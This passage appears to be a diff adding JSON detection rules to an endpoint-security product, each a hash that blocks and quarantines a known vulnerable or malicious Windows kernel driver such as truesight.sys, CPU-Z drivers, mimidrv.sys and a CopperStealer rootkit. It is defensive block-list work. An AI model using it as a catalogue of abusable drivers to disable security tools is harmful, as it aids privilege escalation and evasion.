+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6bd14b5f9ace4e6615309cf6d26ede5871b0e32328b165273fd278bc6759199", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38fef03b-8ddf-5749-8a51-24578c87880f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610263Z", + "creation_date": "2026-03-23T11:45:29.610264Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610270Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11d258e05b850dcc9ecfacccc9486e54bd928aaa3d5e9942696c323fdbd3481b", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3914e5c0-d0b4-5fec-b050-c70035fbf320", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605700Z", + "creation_date": "2026-03-23T11:45:29.605702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605707Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "16a2e578bc8683f17a175480fea4f53c838cfae965f1d4caa47eaf9e0b3415c1", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3914e932-423d-5d5f-977f-81c659219005", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822067Z", + "creation_date": "2026-03-23T11:45:30.822073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bbb894950dc19c804c44a7dce8fe9a7267311e992421faffa8912f8b8b4dc09e", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39312fba-ea16-5c58-8ba6-a609d1cc6ed0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827855Z", + "creation_date": "2026-03-23T11:45:30.827857Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827862Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a8a37ecd464e7120c31d23ee6c4e54f20fa714e1d2fbeb6979629784083ad4f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39464beb-a7f3-5fd9-91bd-227e6f5e4108", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159692Z", + "creation_date": "2026-03-23T11:45:31.159694Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159699Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44a9491e114f20b9f7a413fcfb9dbaebffbd88d8263322aa304667bb2ebf677b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39471791-6a55-512a-ae1a-be6b803dca39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470581Z", + "creation_date": "2026-03-23T11:45:30.470585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29a04c696d544e36b5b5b054b3bfa8c7a5bc2aa261c48eded8f0265d82ec9157", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "394e7ac3-b70b-5bee-9bae-796522e7b8bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155101Z", + "creation_date": "2026-03-23T11:45:31.155104Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a60d45a4456ca9eba653112533846099bd7b92da8ded755d03cad359a4a78f7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39587e0b-0903-5162-8ac7-a823897e6fd3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977296Z", + "creation_date": "2026-03-23T11:45:29.977298Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977303Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45b969ae1b381716a29cd509622470b5b20b70c7efe4c9b7c0568faa298605ff", + "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "395d77d8-ebf5-539e-9aa0-f6f3e82c357c", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981541Z", + "creation_date": "2026-03-23T11:45:29.981554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4582adb2e67eebaff755ae740c1f24bc3af78e0f28e8e8decb99f86bf155ab23", + "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "395fe212-9a74-599d-8698-ad670a25bc0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978371Z", + "creation_date": "2026-03-23T11:45:29.978373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978378Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e274df646f191d2705c0beaa35eeea84808593c3b333809f13632782e27ad75", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "397a1f1e-152a-535d-95ce-06c4560fbd44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147841Z", + "creation_date": "2026-03-23T11:45:31.147843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65f4d41cef7323a54f35954173de466c15b0a07219bc7810881f362576736b1a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39801d61-de27-5902-ae06-b7cdff2dc6ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156603Z", + "creation_date": "2026-03-23T11:45:31.156605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d525a8d02162425964da64cb71cb2e268efe4bef4159b1ec9948eb791339363e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39812975-ad2f-58bc-b565-2a7d184e24f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971561Z", + "creation_date": "2026-03-23T11:45:29.971563Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "950b672d3300bcacefe568156fbc8b16fa09da13df2f6ecda31254faaaf041f9", + "comment": 
"MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3982ea71-9589-5dce-bcf5-2cddfa792d34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475129Z", + "creation_date": "2026-03-23T11:45:30.475133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475142Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "632d62103706b29f10ee8d88c39b5963d9fe388227e78c250e8011c1a43f266b", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "398b0af0-2ef7-5230-b9c1-74a683d3cb7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.980151Z", + "creation_date": "2026-03-23T11:45:29.980152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dafa4459d88a8ab738b003b70953e0780f6b8f09344ce3cd631af70c78310b53", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "398d919d-df91-5e06-93fc-45ad0f0a8fc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150547Z", + "creation_date": "2026-03-23T11:45:31.150549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45ebf3df2b59032512b2b55fd5db17e777ca5fd36acccb31ff441c5d3531cb8a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"399b0dba-0247-583e-99dc-0dea7832a84d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476116Z", + "creation_date": "2026-03-23T11:45:31.476120Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476129Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bed01ddc465cc807cd0dda20a0dab4d8c750c98fc23956e632c813e1f387195", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "39a1eca2-d176-575a-ac93-2b13941f26be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977852Z", + "creation_date": "2026-03-23T11:45:29.977854Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.977859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x86.sys) [https://www.loldrivers.io/drivers/670dc258-78b5-4552-a16b-b41917c86f8d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39a79daa-7633-53f7-abe0-311ac3ca5a06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154769Z",
+ "creation_date": "2026-03-23T11:45:31.154771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154776Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "480eda1cfe3d0dac4782590399966ca677f2e3094ad2cdbb9c79a4199f3b9840",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39a8a443-3b4f-5eec-a6e8-a90f7c0336c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ 
"rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463914Z",
+ "creation_date": "2026-03-23T11:45:30.463917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40556dd9b79b755cc0b48d3d024ceb15bd2c0e04960062ab2a85cd7d4d1b724a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39b7c3c7-d04f-5949-bea8-eec49ceb274c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814185Z",
+ "creation_date": "2026-03-23T11:45:31.814188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"79d2dd6c0e03728a542dfb2c8c2b4f52c1049ac96ce8dd7408f8e6452d0330e3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39b89cb3-f926-5a53-a955-78b6fca09343",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982801Z",
+ "creation_date": "2026-03-23T11:45:29.982803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0e74f565237c32989cb81234f4b5ad85f9dd731c112847c0a143d771021cb99",
+ "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39cb026c-6be2-5b35-ada2-eca51acbb39e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": 
"system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611796Z",
+ "creation_date": "2026-03-23T11:45:29.611798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33b88ac3151f2192eaf4c2be3c7ad00e49090c8b94ec51b754e19ac784b087aa",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39d35dc2-0596-5f83-b0a0-f239b4d4b9d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822437Z",
+ "creation_date": "2026-03-23T11:45:31.822441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822449Z",
+ "rule_level": null,
+ "rule_level_override": null,
